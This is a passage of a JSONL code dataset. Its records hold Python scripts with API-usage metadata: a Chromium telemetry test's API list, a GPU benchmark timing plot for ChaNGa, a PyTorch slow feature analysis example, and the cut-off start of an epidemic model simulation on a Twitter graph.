"telemetry.decorators.Enabled", "line_number": 58, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 58, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 66, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 66, "usage_type": "name"}, {"api_name": "telemetry.core.exceptions.AppCrashException", "line_number": 87, "usage_type": "attribute"}, {"api_name": "telemetry.core.exceptions", "line_number": 87, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 84, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 84, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 94, "usage_type": "call"}, {"api_name": "telemetry.internal.platform.system_info.SystemInfo", "line_number": 100, "usage_type": "attribute"}, {"api_name": "telemetry.internal.platform.system_info", "line_number": 100, "usage_type": "name"}, {"api_name": "telemetry.internal.platform.gpu_info.GPUInfo", "line_number": 103, "usage_type": "attribute"}, {"api_name": "telemetry.internal.platform.gpu_info", "line_number": 103, "usage_type": "name"}, {"api_name": "telemetry.internal.platform.gpu_device.GPUDevice", "line_number": 107, "usage_type": "attribute"}, {"api_name": "telemetry.internal.platform.gpu_device", "line_number": 107, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 111, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 125, "usage_type": "call"}, {"api_name": "re.match", "line_number": 131, "usage_type": "call"}, {"api_name": "telemetry.timeline.tracing_config.TracingConfig", "line_number": 141, "usage_type": "call"}, {"api_name": "telemetry.timeline.tracing_config", "line_number": 141, "usage_type": "name"}, {"api_name": "telemetry.decorators.Disabled", "line_number": 135, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 135, "usage_type": "name"}, {"api_name": "devil.android.app_ui.AppUi", "line_number": 152, "usage_type": "attribute"}, {"api_name": "devil.android.app_ui", "line_number": 152, "usage_type": "name"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 148, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 148, "usage_type": "name"}, {"api_name": "telemetry.testing.browser_test_case.BrowserTestCase", "line_number": 156, "usage_type": "attribute"}, {"api_name": "telemetry.testing.browser_test_case", "line_number": 156, "usage_type": "name"}, {"api_name": "telemetry.testing.browser_test_case.BrowserTestCase", "line_number": 170, "usage_type": "attribute"}, {"api_name": "telemetry.testing.browser_test_case", "line_number": 170, "usage_type": "name"}, {"api_name": "telemetry.decorators.Disabled", "line_number": 175, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 175, "usage_type": "name"}, {"api_name": "telemetry.testing.browser_test_case.BrowserTestCase", "line_number": 180, "usage_type": "attribute"}, {"api_name": "telemetry.testing.browser_test_case", "line_number": 180, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "telemetry.decorators.Disabled", "line_number": 185, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 185, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 191, "usage_type": "attribute"}, {"api_name": "mock.MagicMock", "line_number": 193, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 194, "usage_type": "call"}, {"api_name": "telemetry.internal.browser.browser.Browser", "line_number": 201, "usage_type": "call"}, {"api_name": "telemetry.internal.browser.browser", "line_number": 201, "usage_type": "name"}, {"api_name": "telemetry.internal.browser.browser.Browser", "line_number": 212, "usage_type": "call"}, {"api_name": "telemetry.internal.browser.browser", "line_number": 212, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 218, "usage_type": "attribute"}, {"api_name": "telemetry.testing.options_for_unittests.GetCopy", "line_number": 221, "usage_type": "call"}, {"api_name": "telemetry.testing.options_for_unittests", "line_number": 221, "usage_type": "name"}, {"api_name": "telemetry.internal.browser.browser_finder.FindBrowser", "line_number": 222, "usage_type": "call"}, {"api_name": "telemetry.internal.browser.browser_finder", "line_number": 222, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 249, "usage_type": "call"}, {"api_name": "tempfile.tempdir", "line_number": 249, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 254, "usage_type": "call"}, {"api_name": "tempfile.tempdir", "line_number": 254, "usage_type": "attribute"}, {"api_name": "telemetry.decorators.Enabled", "line_number": 244, "usage_type": "call"}, {"api_name": "telemetry.decorators", "line_number": 244, "usage_type": "name"}, {"api_name": "telemetry.decorators.Isolated", "line_number": 247, "usage_type": "attribute"}, {"api_name": "telemetry.decorators", "line_number": 247, "usage_type": "name"}]} +{"seq_id": "31641158479", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nimport plotting\n\ntheta = [0.1, 0.2, 0.3, 0.4, 0.5, 0.7, 0.9]\ntypes = []\nwith open('timings.csv', 'r') as file:\n reader = csv.reader(file)\n next(reader, None) # skip header\n for row in reader:\n types.append(row[0])\n\ntimings = np.genfromtxt('timings.csv', delimiter=',', usecols=(1, 2, 3, 4, 5, 6, 7))\ntimings_gravity = np.genfromtxt('timings_gravity.csv', delimiter=',', usecols=(1, 2, 3, 4, 5, 6, 7))\n\n# Remove CPU timings\nindices_to_delete = [types.index('CPU'), types.index('CPU-SMP'), types.index('CPU-SMP-SP')]\ntimings = np.delete(timings, indices_to_delete, 0)\ntimings_gravity = np.delete(timings_gravity, indices_to_delete, 0)\ntypes.remove('CPU')\ntypes.remove('CPU-SMP')\ntypes.remove('CPU-SMP-SP')\ngpu_index = types.index('GPU-SMP')\n\nfig, ax = plotting.make_fig(size=(5, 3.8))\n\nbar_width = 0.70 / len(types)\nspacer = 0.1 * bar_width\nalpha = 0.7\nindices = np.arange(len(theta))\noffsets = np.arange(len(types)) * bar_width + spacer\ncolors = ('red', 'orange', 'darkviolet', 'green', 'coral', 'blue', 'darkgrey')\n\ngpu_time = timings[gpu_index, :]\nscaled_timings = timings / gpu_time\nscaled_timings_gravity = timings_gravity / gpu_time\nnon_gravity_timings = scaled_timings - scaled_timings_gravity\ngrav_frac = timings_gravity / timings\n\nfor i in indices:\n plt.bar(i + offsets, non_gravity_timings[:, i], width=bar_width, alpha=alpha, color=colors)\n plt.bar(i + offsets, scaled_timings_gravity[:, i], width=bar_width, alpha=alpha, color='white', edgecolor=colors, bottom=non_gravity_timings[:, i], hatch='//')\n plt.text(i, 1.02 * scaled_timings[gpu_index, i], '{0:.2f}'.format(timings[gpu_index, i]), fontsize=8)\n \n for j in range(len(types)):\n y = non_gravity_timings[j, i] + 0.5 * scaled_timings_gravity[j, i]\n plt.text(i + j * 1.15 * bar_width, y, '{0:d}%'.format(int(100.0 * grav_frac[j, i])), fontsize=6, rotation=90.0)\n\nplt.legend(types, loc='upper center', ncol=3, fancybox=True, shadow=True, fontsize=8)\nl = ax.get_legend()\nfor i in range(len(types)):\n l.legendHandles[i].set_color(colors[i])\n\n# These muck up the legend, so leave them down here\ngrey = '0.4'\nplt.plot((0, len(theta)), (0.95, 0.95), color=grey, linewidth=0.9, alpha=0.2)\nplt.plot((0, len(theta)), (0.90, 0.90), color=grey, linewidth=0.9, alpha=0.2)\nplt.plot((0, len(theta)), (0.80, 0.80), color=grey, linewidth=0.9, alpha=0.2)\nplt.text(indices[-1] + 0.75, 0.65, 'Speedup', color=grey, fontsize=7, rotation=90.0)\nplt.text(indices[-1] + 0.75, 0.95, '5%', color=grey, fontsize=5)\nplt.text(indices[-1] + 0.75, 0.90, '10%', color=grey, fontsize=5)\nplt.text(indices[-1] + 0.75, 0.80, '20%', color=grey, fontsize=5)\n\nplt.xticks(indices, theta)\nplt.yticks(())\nplt.ylim((0.0, 1.3))\nplt.xlabel(r'$\\theta$ (opening angle)')\nplt.ylabel(r'$\\left\\langle t_{{\\rm step}}\\right\\rangle\\,(s)$')\n\nplotting.save_fig(fig, 'gpu-timings.png')\n", "repo_name": "hainest/ChaNGa_test", "sub_path": "benchmarking/plotGPUTimings.py", "file_name": "plotGPUTimings.py", "file_ext": "py", "file_size_in_byte": 2904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 20, "usage_type": "call"}, {"api_name": "plotting.make_fig", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "plotting.save_fig", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "24571187584", "text": "import math\nimport torch\nimport matplotlib.pyplot as plt\nimport sksfa\n\n\n# Time length\ntime_length = 2.0 * math.pi\n\n# Time step\ntime_step = 0.0001\n\n# Number of components to extract\nn_components = 2\n\n# Total number of samples in the timeseries\ntotal_points = time_length / time_step\n\n# Length to plot\nplot_length = 2.0 * math.pi\n\n# Number of points to plot\nplot_points = int(plot_length / time_step)\n\n# Time values\nts_gen = torch.arange(0, time_length, time_step)\nts = [t for t in ts_gen]\n\n# Generate the first signal\n# x1(t) = sin(t) + cos(11t)^2\nx1 = torch.tensor([[torch.sin(t) + torch.pow(torch.cos(11.0 * t), 2)] for t in ts_gen])\n\n# Generate the second signal\n# x2(t) = cos(11*t)\nx2 = torch.tensor([[torch.cos(11.0 * t)] for t in ts_gen])\n\n# Compute x\nx = torch.cat((x1, x2), dim=1)\nx = x - torch.mean(x, dim=0)\nx = x / torch.std(x, dim=0)\n\n# Plot the first signal\nsin_x = torch.tensor([[torch.sin(t)] for t in ts_gen])\nplt.plot(ts[:plot_points], x[:plot_points, 0].numpy(), color='r')\nplt.plot(ts[:plot_points], sin_x[:plot_points, 0], color='black')\nplt.xticks([0, math.pi, 2.0*math.pi])\nplt.yticks([-1, 0, 1])\nplt.ylim(-2, 2)\nplt.title(\"Input component x1(t)\")\nplt.show()\n\n# Plot the second signal\nplt.plot(ts[:plot_points], x[:plot_points, 1].numpy(), color='r')\nplt.xticks([0, math.pi, 2.0*math.pi])\nplt.yticks([-1, 0, 1])\nplt.ylim(-2, 2)\nplt.title(\"Input component x2(t)\")\nplt.show()\n\n# Plot in 2D space\nplt.plot(x[:plot_points, 1].numpy(), x[:plot_points, 0].numpy(), color='r')\nplt.xticks([-1, 0, 1])\nplt.yticks([-2, -1, 0, 1, 2])\nplt.xlabel(\"x2(t)\")\nplt.ylabel(\"x1(t)\")\nplt.title(\"Input trajectory x(t)\")\nplt.show()\n\n\n#\n# EXPANDED SIGNAL\n#\n\n\n# Compute the expended signal z(t)\ndef h(u):\n return torch.cat(\n (\n u,\n torch.mul(u[:, 1], u[:, 1]).reshape(-1, 1),\n torch.mul(u[:, 0], u[:, 0]).reshape(-1, 1),\n torch.mul(u[:, 0], u[:, 1]).reshape(-1, 1)\n ),\n dim=1\n )\n # return u\n# end h\n\n\n# Compute expanded signal z\nz = h(x)\n\n# Plot expanded signal in 3D space\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\nax.plot3D(z[:plot_points, 2], z[:plot_points, 1], z[:plot_points, 0], 'r')\nax.set_xlabel(\"z5\")\nax.set_xlim(-1, 2)\nax.set_ylabel(\"z2\")\nax.set_ylim(-1, 1)\nax.set_zlabel(\"z1\")\nax.set_zlim(-2, 2)\nplt.title(\"Expanded signal z(t)\")\nplt.show()\n\n\n#\n# WHITENING SIGNAL\n#\n\n# Compute the bias\nb = -torch.mean(z, dim=0)\n\n# Centered Z\nzm = z + b\n\n# Compute the covariance matrix of z\ncov_zm = torch.mm(zm.t(), zm) / total_points\n\n# Show the covariance matrix\nplt.imshow(cov_zm.numpy(), cmap='Greys')\nplt.title(\"Centerez z covariance matrix\")\nplt.show()\n\n# Compute the eigenvectors and eigenvalues of the\n# covariance of zm\nD, U = torch.eig(cov_zm, eigenvectors=True)\n\n# Remove imaginary part and compute the diagonal matrix\nD = torch.diag(D[:, 0])\n\n# Compute S, the linear transformation to normalize the signal\n# S = L^-1/2 * Q^T\nS = torch.mm(torch.sqrt(torch.inverse(D)), U.t())\n\n# Normalize the expanded signal z with the linear transformation\n# zs = sqrt(L^-1) * Q^-1 * zm\nzs = torch.mm(S, zm.t()).t()\n\n# Print average of zs to checked\n# centeredness\nprint(\"Average of zs : {}\".format(torch.mean(zs, dim=0)))\n\n# Compute the covariance matrix of zs\ncov_zsT = torch.mm(zs.t(), zs) / total_points\n\n# Show the new covariance matrix\nplt.imshow(cov_zsT.numpy(), cmap='Greys')\nplt.title(\"Sphered z covariance matrix\")\nplt.show()\n\n# Plot sphered expanded signal in 3D space\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\nax.plot3D(zs[:plot_points, 2], zs[:plot_points, 1], zs[:plot_points, 0], 'r')\nax.set_xlabel(\"zs5\")\nax.set_xlim(-1, 2)\nax.set_ylabel(\"zs2\")\nax.set_ylim(-1, 1)\nax.set_zlabel(\"zs1\")\nax.set_zlim(-2, 2)\nplt.title(\"Sphered expanded signal zs(t)\")\nplt.show()\n\n\n#\n# TIME DERIVATIVES\n#\n\n\n# Compute the time derivative of zs\ndzs = (zs[1:] - zs[:-1]) / time_step\n\n# Covariance matrix of dzs\ncov_dzs = torch.mm(dzs.t(), dzs) / total_points\n\n# Compute eignen decomposition on time derivative\nL, V = torch.eig(cov_dzs, eigenvectors=True)\nprint(L)\n# Keep only the needed components\n# V = V[:, :n_components]\n\n# Compute W\nW = torch.mm(V.t(), S)\n\n\ndef g(u):\n # To expanded form\n hu = h(u)\n\n # In component form\n return torch.mm(W, (hu + b).t()).t()\n# end g_func\n\n\n# Invariant features\nsf = g(x)\n\nsfa_transformer = sksfa.SFA(n_components=2, )\nsf_x = sfa_transformer.fit_transform(zm.numpy())\n\n# Plot derivative and expanded signal, in 3D space\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\nax.plot3D(zs[:plot_points, 2]*10.0, zs[:plot_points, 1]*10.0, zs[:plot_points, 0]*10.0, 'r')\nax.plot3D(dzs[:plot_points, 2], dzs[:plot_points, 1], dzs[:plot_points, 0], 'b')\nax.set_xlabel(\"dx1x2\")\nax.set_xlim(-25, 25)\nax.set_ylabel(\"dx2\")\nax.set_ylim(-25, 25)\nax.set_zlabel(\"dx1\")\nax.set_zlim(-25, 25)\nplt.show()\n\n# Show components from home made SFA\nplt.title(\"Components from home made SFA\")\nplt.plot(ts[:plot_points], sf[:plot_points, 0].numpy(), color=(1.0, 0.0, 0.0, 0.5))\nplt.plot(ts[:plot_points], sf[:plot_points, 1].numpy(), color='g')\nplt.plot(ts[:plot_points], sf[:plot_points, 2].numpy(), color=(0.0, 0.0, 1.0, 0.5))\nplt.plot(ts[:plot_points], sf[:plot_points, 3].numpy(), 'black')\nplt.plot(ts[:plot_points], sf[:plot_points, 4].numpy(), color=(1.0, 1.0, 0.0, 0.5))\nplt.xticks([0, math.pi, 2.0*math.pi])\nplt.yticks([-1, 0, 1])\nplt.ylim(-2, 2)\nplt.show()\n\n# Show components from sklearn\nplt.title(\"Components from sklearn SFA\")\nplt.plot(ts[:plot_points], sf_x[:plot_points, 0], 'r')\nplt.plot(ts[:plot_points], sf_x[:plot_points, 1], 'g')\nplt.xticks([0, math.pi, 2.0*math.pi])\nplt.yticks([-1, 0, 1])\nplt.ylim(-2, 2)\nplt.show()\n", "repo_name": "nschaetti/EchoTorch", "sub_path": "examples/features/independent_component_analysis.py", "file_name": "independent_component_analysis.py", "file_ext": "py", "file_size_in_byte": 5627, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 408, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.pi", "line_number": 8, "usage_type": "attribute"}, {"api_name": "math.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cos", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cos", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 54, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.eig", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.diag", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.inverse", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.eig", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 192, "usage_type": "call"}, {"api_name": "sksfa.SFA", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 222, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "math.pi", "line_number": 231, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}]} +{"seq_id": "12613564710", "text": "\nfrom random import randrange\nfrom tqdm import tqdm \nimport click\n\nfrom model import Graph\nfrom sir import SIR, S, I\nfrom tipping import TippingModel\n\n\ndef run(g, seed, model, parameter, target_state):\n\n model = model(parameter)\n model.set_graph(g)\n model.setup(S)\n model.node_states[seed] = I\n\n iters = 150\n for i in range(iters):\n model.iterate()\n# model.inform()\n\n df = model.history_to_df()\n number_of_infected = df.loc[iters, target_state]\n \n return number_of_infected\n \n\n@click.command()\n@click.option(\"-m\", \"--model_type\", default=\"SIR\")\ndef main(model_type):\n \n print(\"Creating graph .... \", end=\"\", flush=True)\n g = Graph(\"twitter_data/twitter_combined.txt\")\n print(\"ok\", flush=True)\n print(\"Nodes:\", g.n_nodes)\n 